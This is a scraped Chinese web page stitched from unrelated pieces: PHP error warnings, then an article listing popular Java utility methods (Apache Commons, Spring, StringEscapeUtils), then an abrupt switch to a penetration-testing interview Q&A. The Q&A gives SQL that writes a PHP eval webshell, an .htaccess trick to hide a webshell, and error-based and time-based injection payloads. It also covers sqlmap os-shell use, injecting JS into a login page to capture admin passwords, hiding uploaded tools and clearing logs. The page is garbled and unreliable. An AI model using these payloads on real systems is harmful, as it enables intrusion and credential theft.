Warning: error_log(/data/www/wwwroot/hmttv.cn/caches/error_log.php): failed to open stream: Permission denied in /data/www/wwwroot/hmttv.cn/phpcms/libs/functions/global.func.php on line 537 Warning: error_log(/data/www/wwwroot/hmttv.cn/caches/error_log.php): failed to open stream: Permission denied in /data/www/wwwroot/hmttv.cn/phpcms/libs/functions/global.func.php on line 537
色字體,選擇“標(biāo)星公眾號(hào)”優(yōu)質(zhì)文章,第一時(shí)間送達(dá)
來(lái)源:juejin.im/post/5d4a25b351882505c105cc6e
在Java中,工具類定義了一組公共方法,這篇文章將介紹Java中使用最頻繁及最通用的Java工具類。以下工具類、方法按使用流行度排名,參考數(shù)據(jù)來(lái)源于Github上隨機(jī)選取的5萬(wàn)個(gè)開源項(xiàng)目源碼。
closeQuietly:關(guān)閉一個(gè)IO流、socket、或者selector且不拋出異常,通常放在finally塊
toString:轉(zhuǎn)換IO流、 Uri、 byte為String
copy:IO流數(shù)據(jù)復(fù)制,從輸入流寫到輸出流中,最大支持2GB
toByteArray:從輸入流、URI獲取byte
write:把字節(jié). 字符等寫入輸出流
toInputStream:把字符轉(zhuǎn)換為輸入流
readLines:從輸入流中讀取多行數(shù)據(jù),返回List<String>
copyLarge:同copy,支持2GB以上數(shù)據(jù)的復(fù)制
lineIterator:從輸入流返回一個(gè)迭代器,根據(jù)參數(shù)要求讀取的數(shù)據(jù)量,全部讀取,如果數(shù)據(jù)不夠,則失敗
deleteDirectory:刪除文件夾
readFileToString:以字符形式讀取文件內(nèi)容
deleteQueitly:刪除文件或文件夾且不會(huì)拋出異常
copyFile:復(fù)制文件
writeStringToFile:把字符寫到目標(biāo)文件,如果文件不存在,則創(chuàng)建
forceMkdir:強(qiáng)制創(chuàng)建文件夾,如果該文件夾父級(jí)目錄不存在,則創(chuàng)建父級(jí)
write:把字符寫到指定文件中
listFiles:列舉某個(gè)目錄下的文件(根據(jù)過(guò)濾器)
copyDirectory:復(fù)制文件夾
forceDelete:強(qiáng)制刪除文件
isBlank:字符串是否為空 (trim后判斷)
isEmpty:字符串是否為空 (不trim并判斷)
equals:字符串是否相等
join:合并數(shù)組為單一字符串,可傳分隔符
split:分割字符串
EMPTY:返回空字符串
trimTo:trim后為空字符串則轉(zhuǎn)換為
replace:替換字符串
toString:把Entity轉(zhuǎn)換為字符串
consume:確保Entity中的內(nèi)容全部被消費(fèi)。可以看到源碼里又一次消費(fèi)了Entity的內(nèi)容,假如用戶沒(méi)有消費(fèi),那調(diào)用Entity時(shí)候?qū)?huì)把它消費(fèi)掉
toByteArray:把Entity轉(zhuǎn)換為字節(jié)流
consumeQuietly:和consume一樣,但不拋異常
getContentCharset:獲取內(nèi)容的編碼
isBlank:字符串是否為空 (trim后判斷)
isEmpty:字符串是否為空 (不trim并判斷)
equals:字符串是否相等
join:合并數(shù)組為單一字符串,可傳分隔符
split:分割字符串
EMPTY:返回空字符串
replace:替換字符串
capitalize:首字符大寫
getExtension:返回文件后綴名
getBaseName:返回文件名,不包含后綴名
getName:返回文件全名
concat:按命令行風(fēng)格組合文件路徑(詳見方法注釋)
removeExtension:刪除后綴名
normalize:使路徑正常化
wildcardMatch:匹配通配符
seperatorToUnix:路徑分隔符改成unix系統(tǒng)格式的,即/
getFullPath:獲取文件路徑,不包括文件名
isExtension:檢查文件后綴名是不是傳入?yún)?shù)(List<String>)中的一個(gè)
hasText:檢查字符串中是否包含文本
hasLength:檢測(cè)字符串是否長(zhǎng)度大于0
isEmpty:檢測(cè)字符串是否為空(若傳入為對(duì)象,則判斷對(duì)象是否為)
commaDelimitedStringToArray:逗號(hào)分隔的String轉(zhuǎn)換為數(shù)組
collectionToDelimitedString:把集合轉(zhuǎn)為CSV格式字符串
replace 替換字符串
delimitedListToStringArray:相當(dāng)于split
uncapitalize:首字母小寫
collectionToDelimitedCommaString:把集合轉(zhuǎn)為CSV格式字符串
tokenizeToStringArray:和split基本一樣,但能自動(dòng)去掉空白的單詞
contains:是否包含某字符串
addAll:添加整個(gè)數(shù)組
clone:克隆一個(gè)數(shù)組
isEmpty:是否空數(shù)組
add:向數(shù)組添加元素
subarray:截取數(shù)組
indexOf:查找某個(gè)元素的下標(biāo)
isEquals:比較數(shù)組是否相等
toObject:基礎(chǔ)類型數(shù)據(jù)數(shù)組轉(zhuǎn)換為對(duì)應(yīng)的Object數(shù)組
參考十五:
org.apache.commons.lang3.StringEscapeUtils
format:格式化參數(shù),返回一個(gè)HTTP POST或者HTTP PUT可用application/x-www-form-urlencoded字符串
parse:把String或者URI等轉(zhuǎn)換為L(zhǎng)ist<NameValuePair>
md5Hex:MD5加密,返回32位字符串
sha1Hex:SHA-1加密
sha256Hex:SHA-256加密
sha512Hex:SHA-512加密
md5:MD5加密,返回16位字符串
isEmpty:是否為空
select:根據(jù)條件篩選集合元素
transform:根據(jù)指定方法處理集合元素,類似List的map
filter:過(guò)濾元素,雷瑟List的filter
find:基本和select一樣
collect:和transform 差不多一樣,但是返回新數(shù)組
forAllDo:調(diào)用每個(gè)元素的指定方法
isEqualCollection:判斷兩個(gè)集合是否一致
contains:是否包含某個(gè)字符串
addAll:添加整個(gè)數(shù)組
clone:克隆一個(gè)數(shù)組
isEmpty:是否空數(shù)組
add:向數(shù)組添加元素
subarray:截取數(shù)組
indexOf:查找某個(gè)元素的下標(biāo)
isEquals:比較數(shù)組是否相等
toObject:基礎(chǔ)類型數(shù)據(jù)數(shù)組轉(zhuǎn)換為對(duì)應(yīng)的Object數(shù)組
getProperty:獲取對(duì)象屬性值
setProperty:設(shè)置對(duì)象屬性值
getPropertyDiscriptor:獲取屬性描述器
isReadable:檢查屬性是否可訪問(wèn)
copyProperties:復(fù)制屬性值,從一個(gè)對(duì)象到另一個(gè)對(duì)象
getPropertyDiscriptors:獲取所有屬性描述器
isWriteable:檢查屬性是否可寫
getPropertyType:獲取對(duì)象屬性類型
unescapeHtml4:轉(zhuǎn)義html
escapeHtml4:反轉(zhuǎn)義html
escapeXml:轉(zhuǎn)義xml
unescapeXml:反轉(zhuǎn)義xml
escapeJava:轉(zhuǎn)義unicode編碼
escapeEcmaScript:轉(zhuǎn)義EcmaScript字符
unescapeJava:反轉(zhuǎn)義unicode編碼
escapeJson:轉(zhuǎn)義json字符
escapeXml10:轉(zhuǎn)義Xml10
這個(gè)現(xiàn)在已經(jīng)廢棄了,建議使用commons-text包里面的方法。
copyPeoperties:復(fù)制屬性值,從一個(gè)對(duì)象到另一個(gè)對(duì)象
getProperty:獲取對(duì)象屬性值
setProperty:設(shè)置對(duì)象屬性值
populate:根據(jù)Map給屬性復(fù)制
copyPeoperty:復(fù)制單個(gè)值,從一個(gè)對(duì)象到另一個(gè)對(duì)象
cloneBean:克隆bean實(shí)例
現(xiàn)在你只要了解了以上16種最流行的工具類方法,你就不必要再自己寫工具類了,不必重復(fù)造輪子。大部分工具類方法通過(guò)其名字就能明白其用途,如果不清楚的,可以看下別人是怎么用的,或者去網(wǎng)上查詢其用法。
另外,工具類,根據(jù)阿里開發(fā)手冊(cè),包名如果要使用util不能帶s,工具類命名為 XxxUtils
如果喜歡本篇文章,歡迎。關(guān)注訂閱號(hào)「Web項(xiàng)目聚集地」,回復(fù)「全棧」即可獲取 2019 年最新 Java、Python、前端學(xué)習(xí)視頻資源。
1.2. 4. 5.6.
紹語(yǔ)
本號(hào)主要是Java常用關(guān)鍵技術(shù)點(diǎn),通用工具類的分享;以及springboot+springcloud+Mybatisplus+druid+mysql+redis+swagger+maven+docker等集成框架的技術(shù)分享;datax、kafka、flink等大數(shù)據(jù)處理框架的技術(shù)分享。文章會(huì)不斷更新,歡迎碼友關(guān)注點(diǎn)贊收藏轉(zhuǎn)發(fā)!
望各位碼友點(diǎn)擊關(guān)注,沖1000粉。后面會(huì)錄制一些視頻教程,圖文和視頻結(jié)合,比如:圖書介紹網(wǎng)站系統(tǒng)、搶購(gòu)系統(tǒng)、大數(shù)據(jù)中臺(tái)系統(tǒng)等。技術(shù)才是程序猿的最愛,碼友們沖啊
如果碼友覺(jué)得代碼太長(zhǎng),可以從頭到尾快速掃射一遍,了解大概即可。覺(jué)得有用后再轉(zhuǎn)發(fā)收藏,以備不時(shí)之需。
正文:
Apache的StringEscapeUtils轉(zhuǎn)義工具類,主要是針對(duì)html、json、xml、js等的轉(zhuǎn)義。具體使用場(chǎng)景在項(xiàng)目中并不是很多,所以可能了解的人也比較少。
import org.apache.commons.text.StringEscapeUtils;
import org.junit.Test;
public class StringEscapeUtilsTest {
@Test
public void test() {
// 轉(zhuǎn)義html腳本和反轉(zhuǎn)義html腳本
String inputText = "<input type=\"button\" value=\"點(diǎn)我\"/>";
String s1 = StringEscapeUtils.escapeHtml4(inputText);
System.out.println(s1);
String s2 = StringEscapeUtils.unescapeHtml4(s1);
System.out.println(s2);
// 轉(zhuǎn)義js腳本和反轉(zhuǎn)義js腳本
String s3 = StringEscapeUtils.escapeEcmaScript("<script>alert('點(diǎn)我')<script>");
System.out.println(s3);
String s4 = StringEscapeUtils.unescapeEcmaScript(s3);
System.out.println(s4);
// 把字符串轉(zhuǎn)義為unicode編碼和從把unicode編碼轉(zhuǎn)義為字符串
String s5 = StringEscapeUtils.escapeJava("abc不要點(diǎn)我了");
System.out.println(s5);
String s6 = StringEscapeUtils.unescapeJava(s5);
System.out.println(s6);
// 轉(zhuǎn)義XML和反轉(zhuǎn)義XML
String s7 = StringEscapeUtils.escapeXml11("<name>張三</name>");
System.out.println(s7);
String s8 = StringEscapeUtils.unescapeXml(s7);
System.out.println(s8);
}
}
其他方法:
工具類源碼:
直接引入工具類的jar包即可
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-text</artifactId>
<version>1.1</version>
</dependency>
和本文使用的相同功能的工具類:
<dependency>
<groupId>commons-lang</groupId>
<artifactId>commons-lang</artifactId>
<version>2.6</version>
</dependency>
<dependency>
<groupId>org.springframework</groupId>
<artifactId>spring-web</artifactId>
<version>5.3.6</version>
</dependency>
<dependency>
<groupId>org.codehaus.groovy</groupId>
<artifactId>groovy-all</artifactId>
<version>3.0.9</version>
<type>pom</type>
</dependency>
鄙人編碼十年多,在項(xiàng)目中也積累了一些工具類,很多工具類在每個(gè)項(xiàng)目都有在用,很實(shí)用。大部分是鄙人封裝的,有些工具類是同事封裝的,有些工具類已經(jīng)不記得是ctrl+c的還是自己封裝的了,現(xiàn)在有空就會(huì)總結(jié)項(xiàng)目中大部分的工具類,分享給各位碼友。如果文章中涉及的代碼有侵權(quán)行為請(qǐng)通知鄙人處理。
計(jì)劃是先把工具類整理出來(lái),正所謂工欲善其事,必先利其器。項(xiàng)目中不管是普通單體項(xiàng)目還是多模塊maven項(xiàng)目或是分布式微服務(wù),一部分功能模塊都是可以重用的,工具類模塊就是其中之一。
.拿到一個(gè)待檢測(cè)的站,你覺(jué)得應(yīng)該先做什么?
1)信息收集 1,獲取域名的whois信息,獲取注冊(cè)者郵箱姓名電話等。 2,查詢服務(wù)器旁站以及子域名站點(diǎn),因?yàn)橹髡疽话惚容^難,所以先看看旁站有沒(méi)有通用性的cms或者其他漏洞。 3,查看服務(wù)器操作系統(tǒng)版本,web中間件,看看是否存在已知的漏洞,比如IIS,APACHE,NGINX的解析漏洞 4,查看IP,進(jìn)行IP地址端口掃描,對(duì)響應(yīng)的端口進(jìn)行漏洞探測(cè),比如 rsync,心臟出血,mysql,ftp,ssh弱口令等。 5,掃描網(wǎng)站目錄結(jié)構(gòu),看看是否可以遍歷目錄,或者敏感文件泄漏,比如php探針 6,google hack 進(jìn)一步探測(cè)網(wǎng)站的信息,后臺(tái),敏感文件 2)漏洞掃描 開始檢測(cè)漏洞,如XSS,XSRF,sql注入,代碼執(zhí)行,命令執(zhí)行,越權(quán)訪問(wèn),目錄讀取,任意文件讀取,下載,文件包含, 遠(yuǎn)程命令執(zhí)行,弱口令,上傳,編輯器漏洞,暴力破解等 3)漏洞利用 利用以上的方式拿到webshell,或者其他權(quán)限 4)權(quán)限提升 提權(quán)服務(wù)器,比如windows下mysql的udf提權(quán),serv-u提權(quán),windows低版本的漏洞,如iis6,pr,巴西烤肉,linux臟牛漏洞,linux內(nèi)核版本漏洞提權(quán),linux下的mysql system提權(quán)以及oracle低權(quán)限提權(quán) 5) 日志清理 6)總結(jié)報(bào)告及修復(fù)方案
2.判斷出網(wǎng)站的CMS對(duì)滲透有什么意義?
查找網(wǎng)上已曝光的程序漏洞。
如果開源,還能下載相對(duì)應(yīng)的源碼進(jìn)行代碼審計(jì)。
3.一個(gè)成熟并且相對(duì)安全的CMS,滲透時(shí)掃目錄的意義?
敏感文件、二級(jí)目錄掃描
站長(zhǎng)的誤操作比如:網(wǎng)站備份的壓縮文件、說(shuō)明.txt、二級(jí)目錄可能存放著其他站點(diǎn)
4.常見的網(wǎng)站服務(wù)器容器。
IIS、Apache、nginx、Lighttpd、Tomcat
5.mysql注入點(diǎn),用工具對(duì)目標(biāo)站直接寫入一句話,需要哪些條件?
root權(quán)限以及網(wǎng)站的絕對(duì)路徑。
6.目前已知哪些版本的容器有解析漏洞,具體舉例。
IIS 6.0 /xx.asp/xx.jpg “xx.asp”是文件夾名
IIS 7.0/7.5 默認(rèn)Fast-CGI開啟,直接在url中圖片地址后面輸入/1.php,會(huì)把正常圖片當(dāng)成php解析
Nginx 版本小于等于0.8.37,利用方法和IIS 7.0/7.5一樣,F(xiàn)ast-CGI關(guān)閉情況下也可利用。 空字節(jié)代碼 xxx.jpg.php
Apache 上傳的文件命名為:test.php.x1.x2.x3,Apache是從右往左判斷后綴
lighttpd xx.jpg/xx.php,不全,請(qǐng)小伙伴們?cè)谠u(píng)論處不吝補(bǔ)充,謝謝!
7.如何手工快速判斷目標(biāo)站是windows還是linux服務(wù)器?
linux大小寫敏感,windows大小寫不敏感。
8.為何一個(gè)mysql數(shù)據(jù)庫(kù)的站,只有一個(gè)80端口開放?
更改了端口,沒(méi)有掃描出來(lái)。
站庫(kù)分離。
3306端口不對(duì)外開放
9、3389無(wú)法連接的幾種情況
沒(méi)開放3389 端口
端口被修改
防護(hù)攔截
處于內(nèi)網(wǎng)(需進(jìn)行端口轉(zhuǎn)發(fā))
10.如何突破注入時(shí)字符被轉(zhuǎn)義?
寬字符注入
hex編碼繞過(guò)
11.在某后臺(tái)新聞編輯界面看到編輯器,應(yīng)該先做什么?
查看編輯器的名稱版本,然后搜索公開的漏洞。
12.拿到一個(gè)webshell發(fā)現(xiàn)網(wǎng)站根目錄下有.htaccess文件,我們能做什么?
能做的事情很多,用隱藏網(wǎng)馬來(lái)舉例子: 插入 <FilesMatch “xxx.jpg”> SetHandler application/x-httpd-php </FilesMatch> .jpg文件會(huì)被解析成.php文件。
具體其他的事情,不好詳說(shuō),建議大家自己去搜索語(yǔ)句來(lái)玩玩。
13.注入漏洞只能查賬號(hào)密碼?
只要權(quán)限廣,拖庫(kù)脫到老。
14.安全狗會(huì)追蹤變量,從而發(fā)現(xiàn)出是一句話木馬嗎?
是根據(jù)特征碼,所以很好繞過(guò)了,只要思路寬,繞狗繞到歡,但這應(yīng)該不會(huì)是一成不變的。
15.access 掃出后綴為asp的數(shù)據(jù)庫(kù)文件,訪問(wèn)亂碼,如何實(shí)現(xiàn)到本地利用?
迅雷下載,直接改后綴為.mdb。
16.提權(quán)時(shí)選擇可讀寫目錄,為何盡量不用帶空格的目錄?
因?yàn)閑xp執(zhí)行多半需要空格界定參數(shù)
17.某服務(wù)器有站點(diǎn)A,B 為何在A的后臺(tái)添加test用戶,訪問(wèn)B的后臺(tái)。發(fā)現(xiàn)也添加上了test用戶?
同數(shù)據(jù)庫(kù)。
18.注入時(shí)可以不使用and 或or 或xor,直接order by 開始注入嗎?
and/or/xor,前面的1=1、1=2步驟只是為了判斷是否為注入點(diǎn),如果已經(jīng)確定是注入點(diǎn)那就可以省那步驟去。
19:某個(gè)防注入系統(tǒng),在注入時(shí)會(huì)提示:
系統(tǒng)檢測(cè)到你有非法注入的行為。已記錄您的ip xx.xx.xx.xx時(shí)間:2016:01-23提交頁(yè)面:test.asp?id=15提交內(nèi)容:and 1=1
20、如何利用這個(gè)防注入系統(tǒng)拿shell?
在URL里面直接提交一句話,這樣網(wǎng)站就把你的一句話也記錄進(jìn)數(shù)據(jù)庫(kù)文件了 這個(gè)時(shí)候可以嘗試尋找網(wǎng)站的配置文件 直接上菜刀鏈接。具體文章參見:http://ytxiao.lofter.com/post/40583a_ab36540。
21.上傳大馬后訪問(wèn)亂碼時(shí),有哪些解決辦法?
瀏覽器中改編碼。
22.審查上傳點(diǎn)的元素有什么意義?
有些站點(diǎn)的上傳文件類型的限制是在前端實(shí)現(xiàn)的,這時(shí)只要增加上傳類型就能突破限制了。
23.目標(biāo)站禁止注冊(cè)用戶,找回密碼處隨便輸入用戶名提示:“此用戶不存在”,你覺(jué)得這里怎樣利用?
先爆破用戶名,再利用被爆破出來(lái)的用戶名爆破密碼。
其實(shí)有些站點(diǎn),在登陸處也會(huì)這樣提示
所有和數(shù)據(jù)庫(kù)有交互的地方都有可能有注入。
24.目標(biāo)站發(fā)現(xiàn)某txt的下載地址為http://www.test.com/down/down.php?file=/upwdown/1.txt,你有什么思路?
這就是傳說(shuō)中的下載漏洞!在file=后面嘗試輸入index.php下載他的首頁(yè)文件,然后在首頁(yè)文件里繼續(xù)查找其他網(wǎng)站的配置文件,可以找出網(wǎng)站的數(shù)據(jù)庫(kù)密碼和數(shù)據(jù)庫(kù)的地址。
25.甲給你一個(gè)目標(biāo)站,并且告訴你根目錄下存在/abc/目錄,并且此目錄下存在編輯器和admin目錄。請(qǐng)問(wèn)你的想法是?
直接在網(wǎng)站二級(jí)目錄/abc/下掃描敏感文件及目錄。
26.在有shell的情況下,如何使用xss實(shí)現(xiàn)對(duì)目標(biāo)站的長(zhǎng)久控制?
后臺(tái)登錄處加一段記錄登錄賬號(hào)密碼的js,并且判斷是否登錄成功,如果登錄成功,就把賬號(hào)密碼記錄到一個(gè)生僻的路徑的文件中或者直接發(fā)到自己的網(wǎng)站文件中。(此方法適合有價(jià)值并且需要深入控制權(quán)限的網(wǎng)絡(luò))。
在登錄后才可以訪問(wèn)的文件中插入XSS腳本。
27.后臺(tái)修改管理員密碼處,原密碼顯示為*。你覺(jué)得該怎樣實(shí)現(xiàn)讀出這個(gè)用戶的密碼?
審查元素 把密碼處的password屬性改成text就明文顯示了
28.目標(biāo)站無(wú)防護(hù),上傳圖片可以正常訪問(wèn),上傳腳本格式訪問(wèn)則403.什么原因?
原因很多,有可能web服務(wù)器配置把上傳目錄寫死了不執(zhí)行相應(yīng)腳本,嘗試改后綴名繞過(guò)
29.審查元素得知網(wǎng)站所使用的防護(hù)軟件,你覺(jué)得怎樣做到的?
在敏感操作被攔截,通過(guò)界面信息無(wú)法具體判斷是什么防護(hù)的時(shí)候,F(xiàn)12看HTML體部 比如護(hù)衛(wèi)神就可以在名稱那看到<hws>內(nèi)容<hws>。
30.在win2003服務(wù)器中建立一個(gè) .zhongzi文件夾用意何為?
隱藏文件夾,為了不讓管理員發(fā)現(xiàn)你傳上去的工具。
31、sql注入有以下兩個(gè)測(cè)試選項(xiàng),選一個(gè)并且闡述不選另一個(gè)的理由:
A. demo.jsp?id=2+1 B. demo.jsp?id=2-1選B,在 URL 編碼中 + 代表空格,可能會(huì)造成混淆
32、以下鏈接存在 sql 注入漏洞,對(duì)于這個(gè)變形注入,你有什么思路?
demo.do?DATA=AjAxNg==DATA有可能經(jīng)過(guò)了 base64 編碼再傳入服務(wù)器,所以我們也要對(duì)參數(shù)進(jìn)行 base64 編碼才能正確完成測(cè)試
33、發(fā)現(xiàn) demo.jsp?uid=110 注入點(diǎn),你有哪幾種思路獲取 webshell,哪種是優(yōu)選?
有寫入權(quán)限的,構(gòu)造聯(lián)合查詢語(yǔ)句使用using INTO OUTFILE,可以將查詢的輸出重定向到系統(tǒng)的文件中,這樣去寫入 WebShell使用 sqlmap –os-shell 原理和上面一種相同,來(lái)直接獲得一個(gè) Shell,這樣效率更高通過(guò)構(gòu)造聯(lián)合查詢語(yǔ)句得到網(wǎng)站管理員的賬戶和密碼,然后掃后臺(tái)登錄后臺(tái),再在后臺(tái)通過(guò)改包上傳等方法上傳 Shell
34、CSRF 和 XSS 和 XXE 有什么區(qū)別,以及修復(fù)方式?
XSS是跨站腳本攻擊,用戶提交的數(shù)據(jù)中可以構(gòu)造代碼來(lái)執(zhí)行,從而實(shí)現(xiàn)竊取用戶信息等攻擊。修復(fù)方式:對(duì)字符實(shí)體進(jìn)行轉(zhuǎn)義、使用HTTP Only來(lái)禁止JavaScript讀取Cookie值、輸入時(shí)校驗(yàn)、瀏覽器與Web應(yīng)用端采用相同的字符編碼。
CSRF是跨站請(qǐng)求偽造攻擊,XSS是實(shí)現(xiàn)CSRF的諸多手段中的一種,是由于沒(méi)有在關(guān)鍵操作執(zhí)行時(shí)進(jìn)行是否由用戶自愿發(fā)起的確認(rèn)。修復(fù)方式:篩選出需要防范CSRF的頁(yè)面然后嵌入Token、再次輸入密碼、檢驗(yàn)RefererXXE是XML外部實(shí)體注入攻擊,XML中可以通過(guò)調(diào)用實(shí)體來(lái)請(qǐng)求本地或者遠(yuǎn)程內(nèi)容,和遠(yuǎn)程文件保護(hù)類似,會(huì)引發(fā)相關(guān)安全問(wèn)題,例如敏感文件讀取。修復(fù)方式:XML解析庫(kù)在調(diào)用時(shí)嚴(yán)格禁止對(duì)外部實(shí)體的解析。
35、CSRF、SSRF和重放攻擊有什么區(qū)別?
CSRF是跨站請(qǐng)求偽造攻擊,由客戶端發(fā)起SSRF是服務(wù)器端請(qǐng)求偽造,由服務(wù)器發(fā)起重放攻擊是將截獲的數(shù)據(jù)包進(jìn)行重放,達(dá)到身份認(rèn)證等目的
36、說(shuō)出至少三種業(yè)務(wù)邏輯漏洞,以及修復(fù)方式?
密碼找回漏洞中存在
1)密碼允許暴力破解、
2)存在通用型找回憑證、
3)可以跳過(guò)驗(yàn)證步驟、
4)找回憑證可以攔包獲取
等方式來(lái)通過(guò)廠商提供的密碼找回功能來(lái)得到密碼。身份認(rèn)證漏洞中最常見的是
1)會(huì)話固定攻擊
2) Cookie 仿冒
只要得到 Session 或 Cookie 即可偽造用戶身份。驗(yàn)證碼漏洞中存在
1)驗(yàn)證碼允許暴力破解
2)驗(yàn)證碼可以通過(guò) Javascript 或者改包的方法來(lái)進(jìn)行繞過(guò)
37、圈出下面會(huì)話中可能存在問(wèn)題的項(xiàng),并標(biāo)注可能會(huì)存在的問(wèn)題?
ActionScript
get /ecskins/demo.jsp?uid=2016031900&keyword=”hello world”HTTP/1.1Host:***.com:82User-Agent:Mozilla/5.0 Firefox/40Accept:text/css,/;q=0.1Accept-Language:zh-CN;zh;q=0.8;en-US;q=0.5,en;q=0.3Referer:http://*******.com/eciop/orderForCC/cgtListForCC.htm?zone=11370601&v=145902Cookie:myguid1234567890=1349db5fe50c372c3d995709f54c273d;uniqueserid=session_OGRMIFIYJHAH5_HZRQOZAMHJ;st_uid=N90PLYHLZGJXI-NX01VPUF46W;status=TrueConnection:keep-alive
38、給你一個(gè)網(wǎng)站你是如何來(lái)滲透測(cè)試的? 在獲取書面授權(quán)的前提下。
39、sqlmap,怎么對(duì)一個(gè)注入點(diǎn)注入? 1)如果是get型號(hào),直接,sqlmap -u “諸如點(diǎn)網(wǎng)址”. 2) 如果是post型諸如點(diǎn),可以sqlmap -u “注入點(diǎn)網(wǎng)址” –data=”post的參數(shù)” 3)如果是cookie,X-Forwarded-For等,可以訪問(wèn)的時(shí)候,用burpsuite抓包,注入處用號(hào)替換,放到文件里,然后sqlmap -r “文件地址”
40、nmap,掃描的幾種方式
41、sql注入的幾種類型? 1)報(bào)錯(cuò)注入 2)bool型注入 3)延時(shí)注入 4)寬字節(jié)注入42、報(bào)錯(cuò)注入的函數(shù)有哪些? 10個(gè) 1)and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】—————- 2)通過(guò)floor報(bào)錯(cuò) 向下取整 3)+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1) 4).geometrycollection()select from test where id=1 and geometrycollection((select from(selectfrom(select user())a)b)); 5).multipoint()select from test where id=1 and multipoint((select from(select from(select user())a)b)); 6).polygon()select from test where id=1 and polygon((select from(select from(select user())a)b)); 7).multipolygon()select from test where id=1 and multipolygon((select from(select from(select user())a)b)); 8).linestring()select from test where id=1 and linestring((select from(select from(select user())a)b)); 9).multilinestring()select from test where id=1 and multilinestring((select from(select from(select user())a)b)); 10).exp()select from test where id=1 and exp(~(select * from(select user())a));
43、延時(shí)注入如何來(lái)判斷? if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)
44、盲注和延時(shí)注入的共同點(diǎn)? 都是一個(gè)字符一個(gè)字符的判斷
45、如何拿一個(gè)網(wǎng)站的webshell? 上傳,后臺(tái)編輯模板,sql注入寫文件,命令執(zhí)行,代碼執(zhí)行, 一些已經(jīng)爆出的cms漏洞,比如dedecms后臺(tái)可以直接建立腳本文件,wordpress上傳插件包含腳本文件zip壓縮包等
46、sql注入寫文件都有哪些函數(shù)? select ‘一句話’ into outfile ‘路徑’ select ‘一句話’ into dumpfile ‘路徑’ select ‘<?php eval($_POST[1]) ?>’ into dumpfile ‘d:\wwwroot\baidu.com\nvhack.php’;
47、如何防止CSRF? 1,驗(yàn)證referer 2,驗(yàn)證token 詳細(xì):http://cnodejs.org/topic/5533dd6e9138f09b629674fd
48、owasp 漏洞都有哪些? 1、SQL注入防護(hù)方法: 2、失效的身份認(rèn)證和會(huì)話管理 3、跨站腳本攻擊XSS 4、直接引用不安全的對(duì)象 5、安全配置錯(cuò)誤 6、敏感信息泄露 7、缺少功能級(jí)的訪問(wèn)控制 8、跨站請(qǐng)求偽造CSRF 9、使用含有已知漏洞的組件 10、未驗(yàn)證的重定向和轉(zhuǎn)發(fā)
49、SQL注入防護(hù)方法? 1、使用安全的API 2、對(duì)輸入的特殊字符進(jìn)行Escape轉(zhuǎn)義處理 3、使用白名單來(lái)規(guī)范化輸入驗(yàn)證方法 4、對(duì)客戶端輸入進(jìn)行控制,不允許輸入SQL注入相關(guān)的特殊字符 5、服務(wù)器端在提交數(shù)據(jù)庫(kù)進(jìn)行SQL查詢之前,對(duì)特殊字符進(jìn)行過(guò)濾、轉(zhuǎn)義、替換、刪除。
50、代碼執(zhí)行,文件讀取,命令執(zhí)行的函數(shù)都有哪些?
1)代碼執(zhí)行:
ActionScript
eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function
2)文件讀取:
ActionScript
file_get_contents(),highlight_file(),fopen(),read
ActionScript
file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等
3)命令執(zhí)行:
ActionScript
system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()
51、img標(biāo)簽除了onerror屬性外,還有其他獲取管理員路徑的辦法嗎? src指定一個(gè)遠(yuǎn)程的腳本文件,獲取referer
52、img標(biāo)簽除了onerror屬性外,并且src屬性的后綴名,必須以.jpg結(jié)尾,怎么獲取管理員路徑。
1)遠(yuǎn)程服務(wù)器修改apache配置文件,配置.jpg文件以php方式來(lái)解析 AddType application/x-httpd-php .jpg <img src=http://xss.tv/1.jpg> 會(huì)以php方式來(lái)解析
*請(qǐng)認(rèn)真填寫需求信息,我們會(huì)在24小時(shí)內(nèi)與您取得聯(lián)系。